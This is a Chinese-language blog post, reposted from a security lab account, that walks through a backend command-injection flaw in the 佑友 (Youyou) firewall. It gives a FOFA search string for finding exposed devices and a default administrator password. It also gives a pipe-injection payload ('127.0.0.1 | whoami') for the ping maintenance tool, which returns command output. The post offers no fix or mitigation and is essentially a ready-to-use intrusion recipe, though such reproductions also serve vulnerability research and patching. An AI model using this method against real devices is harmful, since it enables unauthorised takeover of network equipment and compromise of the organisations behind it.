佑友防火墙 后台命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 佑友防火墙 后台命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

佑友防火墙+路由,保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题;防火墙模块具备了防黑功能,防止ARP等病毒骚扰;佑友防火墙网关同时还配备了上网行为管理模块,可以合理有效控制员工上网行为,大大降低了员工上网中病毒的概率,同时高效使用公司带宽,不会造成网络阻塞等状况。佑友防火墙系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。

图片[1]-佑友防火墙 后台命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofa:title=”佑友防火墙”

1.使用默认密码登录


User: admin
Pass: hicomadmin
图片[2]-佑友防火墙 后台命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

2.系统管理→维护工具→ping→执行whoami命令得到回显

127.0.0.1 | whoami
图片[3]-佑友防火墙 后台命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容